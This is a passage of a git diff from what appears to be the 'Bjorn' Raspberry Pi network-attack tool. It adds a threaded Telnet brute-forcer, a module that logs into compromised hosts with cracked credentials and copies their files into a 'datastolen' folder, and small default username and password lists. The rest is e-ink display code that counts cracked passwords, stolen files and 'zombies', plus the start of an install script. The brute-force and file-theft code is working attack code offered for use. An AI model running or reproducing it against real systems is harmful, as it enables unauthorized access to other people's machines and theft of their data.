tn.write(f'cat {remote_file}\n'.encode('ascii'))
f.write(tn.read_until(b"$", timeout=10))
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
except Exception as e:
logger.error(f"Error downloading file {remote_file} from Telnet: {e}")
def execute(self, ip, port, row, status_key):
"""
Steal files from the remote server using Telnet.
"""
try:
if 'success' in str(row.get(b_parent, '')): # Verify that the parent TelnetBruteforce action succeeded for this host
self.shared_data.bjornorch_status = "StealFilesTelnet"
logger.info(f"Stealing files from {ip}:{port}...")
# Wait a bit because it's too fast to see the status change
time.sleep(5)
# Get Telnet credentials from the cracked passwords file
telnetfile = self.shared_data.telnetfile
credentials = []
if os.path.exists(telnetfile):
with open(telnetfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4]))
logger.info(f"Found {len(credentials)} credentials for {ip}")
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no Telnet connection is established.
"""
if not self.telnet_connected:
logger.error(f"No Telnet connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt to steal files using each credential
success = False
for username, password in credentials:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Steal files execution interrupted due to orchestrator exit.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
tn = self.connect_telnet(ip, username, password)
if tn:
remote_files = self.find_files(tn, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"telnet/{mac}_{ip}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
break
self.steal_file(tn, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} using {username}")
tn.close()
if success:
timer.cancel() # Cancel the timer if the operation is successful
return 'success' # Return success if the operation is successful
except Exception as e:
logger.error(f"Error stealing files from {ip} with user '{username}': {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
logger.error(f"Parent action not successful for {ip}. Skipping steal files action.")
return 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_telnet = StealFilesTelnet(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

206
actions/telnet_connector.py Normal file

@@ -0,0 +1,206 @@
"""
telnet_connector.py - This script performs a brute-force attack on Telnet servers using a list of credentials,
and logs the successful login attempts.
"""
import os
import pandas as pd
import telnetlib
import threading
import logging
import time
from queue import Queue, Empty
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="telnet_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "TelnetBruteforce"
b_module = "telnet_connector"
b_status = "brute_force_telnet"
b_port = 23
b_parent = None
class TelnetBruteforce:
"""
Class to handle the brute-force attack process for Telnet servers.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.telnet_connector = TelnetConnector(shared_data)
logger.info("TelnetConnector initialized.")
def bruteforce_telnet(self, ip, port):
"""
Perform brute-force attack on a Telnet server.
"""
return self.telnet_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute-force attack.
"""
self.shared_data.bjornorch_status = "TelnetBruteforce"
success, results = self.bruteforce_telnet(ip, port)
return 'success' if success else 'failed'
class TelnetConnector:
"""
Class to handle Telnet connections and credential testing.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("23", na=False)]
with open(shared_data.usersfile, "r") as f:
self.users = f.read().splitlines()
with open(shared_data.passwordsfile, "r") as f:
self.passwords = f.read().splitlines()
self.lock = threading.Lock()
self.telnetfile = shared_data.telnetfile
# If the file does not exist, it will be created
if not os.path.exists(self.telnetfile):
logger.info(f"File {self.telnetfile} does not exist. Creating...")
with open(self.telnetfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for Telnet ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("23", na=False)]
def telnet_connect(self, adresse_ip, user, password):
"""
Establish a Telnet connection and try to log in with the provided credentials.
"""
try:
tn = telnetlib.Telnet(adresse_ip)
tn.read_until(b"login: ", timeout=5)
tn.write(user.encode('ascii') + b"\n")
if password:
tn.read_until(b"Password: ", timeout=5)
tn.write(password.encode('ascii') + b"\n")
# Wait to see if the login was successful
time.sleep(2)
response = tn.expect([b"Login incorrect", b"Password: ", br"\$ ", b"# "], timeout=5) # expect() compiles these as regexes, so the shell prompt's '$' must be escaped
tn.close()
# Check if the login was successful
if response[0] == 2 or response[0] == 3:
return True
except Exception as e:
pass
return False
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while True:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
try:
adresse_ip, user, password, mac_address, hostname, port = self.queue.get_nowait() # non-blocking: avoids hanging when another worker drains the queue after the empty() check
except Empty:
break
if self.telnet_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP: {adresse_ip} | User: {user} | Password: {password}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing Telnet...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
try:
self.queue.get_nowait() # non-blocking drain: a worker may grab the last item first
except Empty:
break
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful login attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.telnetfile, index=False, mode='a', header=not os.path.exists(self.telnetfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results file.
"""
df = pd.read_csv(self.telnetfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.telnetfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
telnet_bruteforce = TelnetBruteforce(shared_data)
logger.info("Starting Telnet brute-force attack on port 23...")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute-force attack on each IP
for row in ips_to_scan:
ip = row["IPs"]
logger.info(f"Executing TelnetBruteforce on {ip}...")
telnet_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total number of successes: {len(telnet_bruteforce.telnet_connector.results)}")
exit(len(telnet_bruteforce.telnet_connector.results))
except Exception as e:
logger.error(f"Error: {e}")

71
comment.py Normal file

@@ -0,0 +1,71 @@
# comment.py
# This module defines the `Commentaireia` class, which provides context-based random comments.
# The comments are based on various themes such as "IDLE", "SCANNER", and others, to simulate
# different states or actions within a network scanning and security context. The class uses a
# shared data object to determine delays between comments and switches themes based on the current
# state. The `get_commentaire` method returns a random comment from the specified theme, ensuring
# comments are not repeated too frequently.
import random
import time
import logging
import json
from init_shared import shared_data
from logger import Logger
import os
logger = Logger(name="comment.py", level=logging.DEBUG)
class Commentaireia:
"""Provides context-based random comments for bjorn."""
def __init__(self):
self.shared_data = shared_data
self.last_comment_time = 0 # Initialize last_comment_time
self.comment_delay = random.randint(self.shared_data.comment_delaymin, self.shared_data.comment_delaymax) # Initialize comment_delay
self.last_theme = None # Initialize last_theme
self.themes = self.load_comments(self.shared_data.commentsfile) # Load themes from JSON file
def load_comments(self, commentsfile):
"""Load comments from a JSON file."""
cache_file = commentsfile + '.cache'
# Check if a cached version exists and is newer than the original file
if os.path.exists(cache_file) and os.path.getmtime(cache_file) >= os.path.getmtime(commentsfile):
try:
with open(cache_file, 'r') as file:
comments_data = json.load(file)
logger.info("Comments loaded successfully from cache.")
return comments_data
except (FileNotFoundError, json.JSONDecodeError):
logger.warning("Cache file is corrupted or not found. Loading from the original file.")
# Load from the original file if cache is not used or corrupted
try:
with open(commentsfile, 'r') as file:
comments_data = json.load(file)
logger.info("Comments loaded successfully from JSON file.")
# Save to cache
with open(cache_file, 'w') as cache:
json.dump(comments_data, cache)
return comments_data
except FileNotFoundError:
logger.error(f"The file '{commentsfile}' was not found.")
return {"IDLE": ["Default comment, no comments file found."]} # Fallback to a default theme
except json.JSONDecodeError:
logger.error(f"The file '{commentsfile}' is not a valid JSON file.")
return {"IDLE": ["Default comment, invalid JSON format."]} # Fallback to a default theme
def get_commentaire(self, theme):
""" This method returns a random comment based on the specified theme."""
current_time = time.time() # Get the current time in seconds
if theme != self.last_theme or current_time - self.last_comment_time >= self.comment_delay: # Check if the theme has changed or if the delay has expired
self.last_comment_time = current_time # Update the last comment time
self.last_theme = theme # Update the last theme
if theme not in self.themes:
logger.warning(f"The theme '{theme}' is not defined, using the default theme IDLE.")
theme = "IDLE"
return random.choice(self.themes[theme]) # Return a random comment based on the specified theme
else:
return None
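(The comments file consumed by load_comments() is a plain JSON object mapping theme names to lists of candidate strings — that is the shape the fallback returns and get_commentaire() indexes into. A minimal sketch of the expected format; the entries below are illustrative, not the shipped file:)

{
    "IDLE": ["Nothing to do... sharpening my axe.", "Waiting for targets..."],
    "SCANNER": ["Scanning the network...", "Looking for new victims..."]
}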

View File

@@ -0,0 +1,3 @@
root
admin
bjorn

View File

@@ -0,0 +1,3 @@
root
admin
bjorn

385
display.py Normal file
View File

@@ -0,0 +1,385 @@
#display.py
# Description:
# This file, display.py, is responsible for managing the e-ink display of the Bjorn project, updating it with relevant data and statuses.
# It initializes the display, manages multiple threads for updating shared data and vulnerability counts, and handles the rendering of information
# and images on the display.
#
# Key functionalities include:
# - Initializing the e-ink display (EPD) and handling any errors during initialization.
# - Creating and managing threads to periodically update shared data and vulnerability counts.
# - Rendering various statistics, status icons, and images on the e-ink display.
# - Handling updates to shared data from various sources, including CSV files and system commands.
# - Checking and displaying the status of Bluetooth, Wi-Fi, PAN, and USB connections.
# - Providing methods to update the display with comments from an AI (Commentaireia) and generating images dynamically.
import threading
import time
import os
import pandas as pd
import signal
import glob
import logging
import random
import sys
from PIL import Image, ImageDraw
from init_shared import shared_data
from comment import Commentaireia
from logger import Logger
import subprocess
logger = Logger(name="display.py", level=logging.DEBUG)
class Display:
def __init__(self, shared_data):
"""Initialize the display and start the main image and shared data update threads."""
self.shared_data = shared_data
self.shared_data.bjornstatustext2 = "Awakening..."
        self.commentaire_ia = Commentaireia()
        self.main_image = None  # Set by the update_main_image thread; initialized here so run() can safely test it
        self.semaphore = threading.Semaphore(10)
self.screen_reversed = self.shared_data.screen_reversed
self.web_screen_reversed = self.shared_data.web_screen_reversed
try:
self.epd_helper = self.shared_data.epd_helper
self.epd_helper.init_partial_update()
logger.info("Display initialization complete.")
except Exception as e:
logger.error(f"Error during display initialization: {e}")
raise
self.main_image_thread = threading.Thread(target=self.update_main_image)
self.main_image_thread.daemon = True
self.main_image_thread.start()
self.update_shared_data_thread = threading.Thread(target=self.schedule_update_shared_data)
self.update_shared_data_thread.daemon = True
self.update_shared_data_thread.start()
self.update_vuln_count_thread = threading.Thread(target=self.schedule_update_vuln_count)
self.update_vuln_count_thread.daemon = True
self.update_vuln_count_thread.start()
self.scale_factor_x = self.shared_data.scale_factor_x
self.scale_factor_y = self.shared_data.scale_factor_y
def schedule_update_shared_data(self):
"""Periodically update the shared data with the latest system information."""
while not self.shared_data.display_should_exit:
self.update_shared_data()
time.sleep(25)
def schedule_update_vuln_count(self):
"""Periodically update the vulnerability count on the display."""
while not self.shared_data.display_should_exit:
self.update_vuln_count()
time.sleep(300)
def update_main_image(self):
"""Update the main image on the display with the latest immagegen data."""
while not self.shared_data.display_should_exit:
try:
self.shared_data.update_image_randomizer()
if self.shared_data.imagegen:
self.main_image = self.shared_data.imagegen
else:
logger.error("No image generated for current status.")
time.sleep(random.uniform(self.shared_data.image_display_delaymin, self.shared_data.image_display_delaymax))
except Exception as e:
logger.error(f"An error occurred in update_main_image: {e}")
def get_open_files(self):
"""Get the number of open FD files on the system."""
try:
open_files = len(glob.glob('/proc/*/fd/*'))
logger.debug(f"FD : {open_files}")
return open_files
except Exception as e:
logger.error(f"Error getting open files: {e}")
return None
def update_vuln_count(self):
"""Update the vulnerability count on the display."""
with self.semaphore:
try:
if not os.path.exists(self.shared_data.vuln_summary_file):
# Create the file with the necessary columns if it does not exist
df = pd.DataFrame(columns=["IP", "Hostname", "MAC Address", "Port", "Vulnerabilities"])
df.to_csv(self.shared_data.vuln_summary_file, index=False)
self.shared_data.vulnnbr = 0
logger.info("Vulnerability summary file created.")
else:
# Load the netkbfile to check for "Alive" IPs
if os.path.exists(self.shared_data.netkbfile):
with open(self.shared_data.netkbfile, 'r') as file:
netkb_df = pd.read_csv(file)
alive_macs = set(netkb_df[(netkb_df["Alive"] == 1) & (netkb_df["MAC Address"] != "STANDALONE")]["MAC Address"]) # Get all alive MACs based on the 'Alive' column and ignore "STANDALONE"
else:
alive_macs = set()
with open(self.shared_data.vuln_summary_file, 'r') as file:
df = pd.read_csv(file)
all_vulnerabilities = set()
for index, row in df.iterrows():
mac_address = row["MAC Address"]
if mac_address in alive_macs and mac_address != "STANDALONE": # Ignore "STANDALONE" MAC addresses
vulnerabilities = row["Vulnerabilities"]
if pd.isna(vulnerabilities) or not isinstance(vulnerabilities, str): # Check if vulnerabilities is NaN or not a string
# logger.debug(f"No valid vulnerabilities for MAC Address: {mac_address}")
continue
if vulnerabilities and isinstance(vulnerabilities, str):
all_vulnerabilities.update(vulnerabilities.split("; ")) # Add the vulnerabilities to the set
self.shared_data.vulnnbr = len(all_vulnerabilities)
logger.debug(f"Updated vulnerabilities count: {self.shared_data.vulnnbr}")
# Update the livestatusfile
if os.path.exists(self.shared_data.livestatusfile):
with open(self.shared_data.livestatusfile, 'r+') as livestatus_file:
livestatus_df = pd.read_csv(livestatus_file)
livestatus_df.loc[0, 'Vulnerabilities Count'] = self.shared_data.vulnnbr
livestatus_df.to_csv(self.shared_data.livestatusfile, index=False)
logger.debug(f"Updated livestatusfile with vulnerability count: {self.shared_data.vulnnbr}")
else:
logger.error(f"Livestatusfile {self.shared_data.livestatusfile} does not exist.")
except Exception as e:
logger.error(f"An error occurred in update_vuln_count: {e}")
def update_shared_data(self):
"""Update the shared data with the latest system information."""
with self.semaphore:
"""
Update shared data from CSV files live_status.csv and cracked_passwords.csv.
"""
try:
with open(self.shared_data.livestatusfile, 'r') as file:
livestatus_df = pd.read_csv(file)
self.shared_data.portnbr = livestatus_df['Total Open Ports'].iloc[0] # Get the total number of open ports
self.shared_data.targetnbr = livestatus_df['Alive Hosts Count'].iloc[0] # Get the total number of alive hosts
self.shared_data.networkkbnbr = livestatus_df['All Known Hosts Count'].iloc[0] # Get the total number of known hosts
self.shared_data.vulnnbr = livestatus_df['Vulnerabilities Count'].iloc[0] # Get the total number of vulnerable ports
crackedpw_files = glob.glob(f"{self.shared_data.crackedpwddir}/*.csv") # Get all CSV files in the cracked password directory
total_passwords = 0
for file in crackedpw_files:
with open(file, 'r') as f:
total_passwords += len(pd.read_csv(f, usecols=[0]))
self.shared_data.crednbr = total_passwords # Set the total number of cracked passwords to shared data
total_data = sum([len(files) for r, d, files in os.walk(self.shared_data.datastolendir)]) # Get the total number of data files in the data store directory
self.shared_data.datanbr = total_data
total_zombies = sum([len(files) for r, d, files in os.walk(self.shared_data.zombiesdir)]) # Get the total number of zombies in the zombies directory
self.shared_data.zombiesnbr = total_zombies
total_attacks = sum([len(files) for r, d, files in os.walk(self.shared_data.actions_dir) if not r.endswith("__pycache__")]) - 2
self.shared_data.attacksnbr = total_attacks
self.shared_data.update_stats()
# Update Bluetooth, WiFi, and PAN connection status
self.shared_data.manual_mode = self.is_manual_mode()
if self.shared_data.manual_mode:
self.manual_mode_txt = "M"
else:
self.manual_mode_txt = "A"
# # self.shared_data.bluetooth_active = self.is_bluetooth_connected()
self.shared_data.wifi_connected = self.is_wifi_connected()
self.shared_data.usb_active = self.is_usb_connected()
########self.shared_data.pan_connected = self.is_interface_connected('pan0') or self.is_interface_connected('usb0')
self.get_open_files()
except (FileNotFoundError, pd.errors.EmptyDataError) as e:
logger.error(f"Error: {e}")
except Exception as e:
logger.error(f"Error updating shared data: {e}")
def display_comment(self, status):
""" Display the comment based on the status of the BjornOrch. """
comment = self.commentaire_ia.get_commentaire(status) # Get the comment from Commentaireia
if comment:
self.shared_data.bjornsay = comment # Set the comment to shared data
self.shared_data.bjornstatustext = self.shared_data.bjornorch_status # Set the status to shared data
else:
pass
# # # def is_bluetooth_connected(self):
# # # """
# # # Check if any device is connected to the Bluetooth (pan0) interface by checking the output of 'ip neigh show dev pan0'.
# # # """
# # # try:
# # # result = subprocess.Popen(['ip', 'neigh', 'show', 'dev', 'pan0'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
# # # output, error = result.communicate()
# # # if result.returncode != 0:
# # # logger.error(f"Error executing 'ip neigh show dev pan0': {error}")
# # # return False
# # # return bool(output.strip())
# # # except Exception as e:
# # # logger.error(f"Error checking Bluetooth connection status: {e}")
# # # return False
def is_wifi_connected(self):
"""
Check if WiFi is connected by checking the current SSID.
"""
try:
result = subprocess.Popen(['iwgetid', '-r'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
ssid, error = result.communicate()
if result.returncode != 0:
logger.error(f"Error executing 'iwgetid -r': {error}")
return False
return bool(ssid.strip()) # Return True if connected to a WiFi network
except Exception as e:
logger.error(f"Error checking WiFi status: {e}")
return False
def is_manual_mode(self):
"""Check if the BjornOrch is in manual mode."""
return self.shared_data.manual_mode
def is_interface_connected(self, interface):
"""
Check if any device is connected to the specified interface (pan0 or usb0)
by checking the output of 'ip neigh show dev <interface>'.
"""
try:
result = subprocess.Popen(['ip', 'neigh', 'show', 'dev', interface], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
output, error = result.communicate()
if result.returncode != 0:
logger.error(f"Error executing 'ip neigh show dev {interface}': {error}")
return False
return bool(output.strip())
except Exception as e:
logger.error(f"Error checking connection status on {interface}: {e}")
return False
def is_usb_connected(self):
"""
Check if any device is connected to the USB (usb0) interface by checking the output of 'ip neigh show dev usb0'.
"""
try:
result = subprocess.Popen(['ip', 'neigh', 'show', 'dev', 'usb0'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
output, error = result.communicate()
if result.returncode != 0:
logger.error(f"Error executing 'ip neigh show dev usb0': {error}")
return False
return bool(output.strip())
except Exception as e:
logger.error(f"Error checking USB connection status: {e}")
return False
def run(self):
"""
Main loop for updating the EPD display with shared data.
"""
self.manual_mode_txt = ""
while not self.shared_data.display_should_exit:
try:
self.epd_helper.init_partial_update()
self.display_comment(self.shared_data.bjornorch_status) # Display the comment
image = Image.new('1', (self.shared_data.width, self.shared_data.height))
draw = ImageDraw.Draw(image)
draw.rectangle((0, 0, self.shared_data.width, self.shared_data.height), fill=255)
draw.text((int(37 * self.scale_factor_x), int(5 * self.scale_factor_y)), "BJORN", font=self.shared_data.font_viking, fill=0)
draw.text((int(110 * self.scale_factor_x), int(170 * self.scale_factor_y)), self.manual_mode_txt, font=self.shared_data.font_arial14, fill=0)
if self.shared_data.wifi_connected:
image.paste(self.shared_data.wifi, (int(3 * self.scale_factor_x), int(3 * self.scale_factor_y)))
# # # if self.shared_data.bluetooth_active:
# # # image.paste(self.shared_data.bluetooth, (int(23 * self.scale_factor_x), int(4 * self.scale_factor_y)))
if self.shared_data.pan_connected:
image.paste(self.shared_data.connected, (int(104 * self.scale_factor_x), int(3 * self.scale_factor_y)))
if self.shared_data.usb_active:
image.paste(self.shared_data.usb, (int(90 * self.scale_factor_x), int(4 * self.scale_factor_y)))
stats = [
(self.shared_data.target, (int(8 * self.scale_factor_x), int(22 * self.scale_factor_y)), (int(28 * self.scale_factor_x), int(22 * self.scale_factor_y)), str(self.shared_data.targetnbr)),
(self.shared_data.port, (int(47 * self.scale_factor_x), int(22 * self.scale_factor_y)), (int(67 * self.scale_factor_x), int(22 * self.scale_factor_y)), str(self.shared_data.portnbr)),
(self.shared_data.vuln, (int(86 * self.scale_factor_x), int(22 * self.scale_factor_y)), (int(106 * self.scale_factor_x), int(22 * self.scale_factor_y)), str(self.shared_data.vulnnbr)),
(self.shared_data.cred, (int(8 * self.scale_factor_x), int(41 * self.scale_factor_y)), (int(28 * self.scale_factor_x), int(41 * self.scale_factor_y)), str(self.shared_data.crednbr)),
(self.shared_data.money, (int(3 * self.scale_factor_x), int(172 * self.scale_factor_y)), (int(3 * self.scale_factor_x), int(192 * self.scale_factor_y)), str(self.shared_data.coinnbr)),
(self.shared_data.level, (int(2 * self.scale_factor_x), int(217 * self.scale_factor_y)), (int(4 * self.scale_factor_x), int(237 * self.scale_factor_y)), str(self.shared_data.levelnbr)),
(self.shared_data.zombie, (int(47 * self.scale_factor_x), int(41 * self.scale_factor_y)), (int(67 * self.scale_factor_x), int(41 * self.scale_factor_y)), str(self.shared_data.zombiesnbr)),
(self.shared_data.networkkb, (int(102 * self.scale_factor_x), int(190 * self.scale_factor_y)), (int(102 * self.scale_factor_x), int(208 * self.scale_factor_y)), str(self.shared_data.networkkbnbr)),
(self.shared_data.data, (int(86 * self.scale_factor_x), int(41 * self.scale_factor_y)), (int(106 * self.scale_factor_x), int(41 * self.scale_factor_y)), str(self.shared_data.datanbr)),
(self.shared_data.attacks, (int(100 * self.scale_factor_x), int(218 * self.scale_factor_y)), (int(102 * self.scale_factor_x), int(237 * self.scale_factor_y)), str(self.shared_data.attacksnbr)),
]
for img, img_pos, text_pos, text in stats:
image.paste(img, img_pos)
draw.text(text_pos, text, font=self.shared_data.font_arial9, fill=0)
self.shared_data.update_bjornstatus()
image.paste(self.shared_data.bjornstatusimage, (int(3 * self.scale_factor_x), int(60 * self.scale_factor_y)))
draw.text((int(35 * self.scale_factor_x), int(65 * self.scale_factor_y)), self.shared_data.bjornstatustext, font=self.shared_data.font_arial9, fill=0)
draw.text((int(35 * self.scale_factor_x), int(75 * self.scale_factor_y)), self.shared_data.bjornstatustext2, font=self.shared_data.font_arial9, fill=0)
image.paste(self.shared_data.frise, (int(0 * self.scale_factor_x), int(160 * self.scale_factor_y)))
draw.rectangle((1, 1, self.shared_data.width - 1, self.shared_data.height - 1), outline=0)
draw.line((1, 20, self.shared_data.width - 1, 20), fill=0)
draw.line((1, 59, self.shared_data.width - 1, 59), fill=0)
draw.line((1, 87, self.shared_data.width - 1, 87), fill=0)
lines = self.shared_data.wrap_text(self.shared_data.bjornsay, self.shared_data.font_arialbold, self.shared_data.width - 4)
y_text = int(90 * self.scale_factor_y)
if self.main_image is not None:
image.paste(self.main_image, (self.shared_data.x_center1, self.shared_data.y_bottom1))
else:
logger.error("Main image not found in shared_data.")
for line in lines:
draw.text((int(4 * self.scale_factor_x), y_text), line, font=self.shared_data.font_arialbold, fill=0) # Display the comment
y_text += (self.shared_data.font_arialbold.getbbox(line)[3] - self.shared_data.font_arialbold.getbbox(line)[1]) + 3 # Calculate the height of the text depending on the font size, 3 means the space between lines
if self.screen_reversed:
image = image.transpose(Image.ROTATE_180)
self.epd_helper.display_partial(image)
self.epd_helper.display_partial(image)
if self.web_screen_reversed:
image = image.transpose(Image.ROTATE_180)
with open(os.path.join(self.shared_data.webdir, "screen.png"), 'wb') as img_file:
image.save(img_file)
img_file.flush()
os.fsync(img_file.fileno())
time.sleep(self.shared_data.screen_delay)
except Exception as e:
logger.error(f"An exception occurred: {e}")
def handle_exit_display(signum, frame, display_thread):
    """Handle the exit signal and put the display to sleep before exiting."""
    shared_data.display_should_exit = True
    logger.info("Exit signal received. Waiting for the main loop to finish...")
    try:
        if main_loop and getattr(main_loop, 'epd_helper', None):
            main_loop.epd_helper.epd.sleep()  # Put the panel into deep sleep before exiting
    except Exception as e:
        logger.error(f"Error while closing the display: {e}")
    display_thread.join()
    logger.info("Main loop finished. Clean exit.")
    sys.exit(0)  # sys.exit(0) rather than exit(0), which is meant for interactive sessions
# Declare main_loop globally
main_loop = None
if __name__ == "__main__":
try:
logger.info("Starting main loop...")
main_loop = Display(shared_data)
display_thread = threading.Thread(target=main_loop.run)
display_thread.start()
logger.info("Main loop started.")
signal.signal(signal.SIGINT, lambda signum, frame: handle_exit_display(signum, frame, display_thread))
signal.signal(signal.SIGTERM, lambda signum, frame: handle_exit_display(signum, frame, display_thread))
except Exception as e:
logger.error(f"An exception occurred during program execution: {e}")
handle_exit_display(signal.SIGINT, None, display_thread)
        sys.exit(1)  # sys.exit(1) rather than exit(1), which is meant for interactive sessions

68
epd_helper.py Normal file
View File

@@ -0,0 +1,68 @@
# epd_helper.py
import importlib
import logging
logger = logging.getLogger(__name__)
class EPDHelper:
def __init__(self, epd_type):
self.epd_type = epd_type
self.epd = self._load_epd_module()
def _load_epd_module(self):
try:
epd_module_name = f'resources.waveshare_epd.{self.epd_type}'
epd_module = importlib.import_module(epd_module_name)
return epd_module.EPD()
except ImportError as e:
logger.error(f"EPD module {self.epd_type} not found: {e}")
raise
except Exception as e:
logger.error(f"Error loading EPD module {self.epd_type}: {e}")
raise
def init_full_update(self):
try:
if hasattr(self.epd, 'FULL_UPDATE'):
self.epd.init(self.epd.FULL_UPDATE)
elif hasattr(self.epd, 'lut_full_update'):
self.epd.init(self.epd.lut_full_update)
else:
self.epd.init()
logger.info("EPD full update initialization complete.")
except Exception as e:
logger.error(f"Error initializing EPD for full update: {e}")
raise
def init_partial_update(self):
try:
if hasattr(self.epd, 'PART_UPDATE'):
self.epd.init(self.epd.PART_UPDATE)
elif hasattr(self.epd, 'lut_partial_update'):
self.epd.init(self.epd.lut_partial_update)
else:
self.epd.init()
logger.info("EPD partial update initialization complete.")
except Exception as e:
logger.error(f"Error initializing EPD for partial update: {e}")
raise
def display_partial(self, image):
try:
if hasattr(self.epd, 'displayPartial'):
self.epd.displayPartial(self.epd.getbuffer(image))
else:
self.epd.display(self.epd.getbuffer(image))
logger.info("Partial display update complete.")
except Exception as e:
logger.error(f"Error during partial display update: {e}")
raise
def clear(self):
try:
self.epd.Clear()
logger.info("EPD cleared.")
except Exception as e:
logger.error(f"Error clearing EPD: {e}")
raise
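(A minimal usage sketch for EPDHelper — the panel type string must name a driver module under resources/waveshare_epd; "epd2in13_V2" and the 122x250 geometry below are illustrative and depend on the actual HAT:)

from PIL import Image
from epd_helper import EPDHelper

helper = EPDHelper("epd2in13_V2")   # imports resources.waveshare_epd.epd2in13_V2 and instantiates its EPD()
helper.init_partial_update()        # falls back to plain init() if the driver has no partial-update LUT
canvas = Image.new('1', (122, 250), 255)  # 1-bit canvas, white background
helper.display_partial(canvas)
helper.clear()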

13
init_shared.py Normal file
View File

@@ -0,0 +1,13 @@
#init_shared.py
# Description:
# This file, init_shared.py, is responsible for initializing and providing access to shared data across different modules in the Bjorn project.
#
# Key functionalities include:
# - Importing the `SharedData` class from the `shared` module.
# - Creating an instance of `SharedData` named `shared_data` that holds common configuration, paths, and other resources.
# - Ensuring that all modules importing `shared_data` will have access to the same instance, promoting consistency and ease of data management throughout the project.
from shared import SharedData
shared_data = SharedData()
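(Python caches imported modules in sys.modules, so every `from init_shared import shared_data` yields this same SharedData instance. A minimal illustration — the module names are hypothetical:)

# module_a.py
from init_shared import shared_data
shared_data.manual_mode = True

# module_b.py (imported later, anywhere in the same process)
from init_shared import shared_data
print(shared_data.manual_mode)  # True — the same instance module_a mutated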

596
install_bjorn.sh Normal file
View File

@@ -0,0 +1,596 @@
#!/bin/bash
# BJORN Installation Script
# This script handles the complete installation of BJORN
# Author: infinition
# Version: 1.0 - 071124 - 0954
# Colors for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
NC='\033[0m'
# Logging configuration
LOG_DIR="/var/log/bjorn_install"
mkdir -p "$LOG_DIR"
LOG_FILE="$LOG_DIR/bjorn_install_$(date +%Y%m%d_%H%M%S).log"
VERBOSE=false
# Global variables
BJORN_USER="bjorn"
BJORN_PATH="/home/${BJORN_USER}/Bjorn"
CURRENT_STEP=0
TOTAL_STEPS=8
